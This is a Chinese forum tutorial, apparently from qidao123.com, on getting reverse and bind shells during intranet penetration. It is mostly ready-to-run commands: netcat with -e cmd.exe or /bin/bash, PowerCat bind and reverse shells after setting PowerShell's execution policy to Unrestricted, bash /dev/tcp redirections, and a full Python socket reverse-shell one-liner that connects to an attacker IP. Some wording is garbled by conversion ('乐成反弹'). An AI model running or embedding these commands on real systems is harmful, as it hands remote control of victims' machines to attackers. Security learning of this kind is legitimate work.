内网安全:反弹shell

打印 上一主题 下一主题

主题 551|帖子 551|积分 1653

目录
一.Netcat反弹Shell
二.PowerCat反弹Shell
PowerCat和nc正向连接
PowerCat和nc反向连接
PowerCat和PowerCat反向连接
三.Bash反弹shell
四.Python 反弹Shell



一.Netcat反弹Shell

在Windows容易被杀
介绍:
   Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作,常用参数如下
    注意:这里需要关闭靶机的防火墙,做NC反弹的时候,前提你也经控制了对方电脑
  正向反弹:
   场景:攻击机器和靶机都是在公网上,都能互ping,这个时候可以用正向反弾
  利用:
1.在靶机上运行:
   nc -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器
  nc -lvvp 1111 -e /bin/bash linux机器
  这里以Linux作演示
  

2在攻击机上运行:
   nc -v 靶机IP 1111
  

3.拿到shell
反向反弹:
实行前提:
   攻击机器在公网上,靶机在内网里面,这时候需要靶机反向链接攻击机器,也就是反向反弹
  利用:
1在攻击者机器运行:
   nc -lvvp 1111 监听1111端口
  

2.在靶机上运行 (反弹到公网)
   nc -e C:\Windows\System32\cmd.exe 攻击IP 1111 windos机器
  nc -e /bin/bash 攻击IP 1111 linux机器
  这里用Linux作演示

3.拿到反向的shell


二.PowerCat反弹Shell

和NC作用一样,只能用于Windows
   介绍:可以无文件落地
  PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncat的powershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,天生payload,端口扫描等等。
  利用:
1.导入模块:
   Import-Module .\powercat.ps1
  

假如提示未能加载指定模块,则可能是权限问题,输入如下代码
   Set-ExecutionPolicy Unrestricted
  
PowerCat和nc正向连接

1、靶机利用powercat执行以下命令:
   powercat -l -p 8080 -e cmd.exe -v
  

2、攻击机利用nc执行以下命令:
   nc -v 靶机IP 8080 -vv
  

3.乐成反弹

PowerCat和nc反向连接

1、靶机利用powercat执行以下命令
   powercat -c 攻击机IP -p 8888 -v -e cmd.exe
  

2、攻击机利用nc执行以下命令:
   nc -l -p 8888 -vv
  

3.乐成反弹


PowerCat和PowerCat反向连接

1、靶机利用powercat执行以下命令:
   powercat -c 攻击机器IP -p 9999 -v -ep
  

2、攻击机利用powercat执行以下命令:
   powercat -l -p 9999 -v
  

3.乐成反弹


三.Bash反弹shell

   介绍:传输层的隧道
  ** Shell也称为终端或壳,是人与内核之间的翻译官,而Bash则是Linux中默认利用的Shell**
    ** Bash 反弹Shell的命令如下:**
  bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&1
  bash -i >&/dev/tcp/攻击机_IP/攻击机端口 0>&2
  bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&1
  bash -i >&/dev/udp/攻击机_IP/攻击机端口 0>&2
  利用:
1、攻击机器利用nc执行监服从令**
   nc -lvvp 9999 监听 TCP
  

   nc -lup 9999 监听UDP (UDP不稳定)
  2、实行靶机执行连接命令
   bash -i >&/dev/tcp/攻击机器IP/9999 0>&1
  

3.乐成反弹


四.Python 反弹Shell

利用:
1、攻击机器利用nc执行监服从令
   nc -lvvp 1111 监听 TCP
  

2、实行靶机执行连接命令
   python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("攻击机器IP",1111));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
  

3.乐成反弹






免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

守听

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表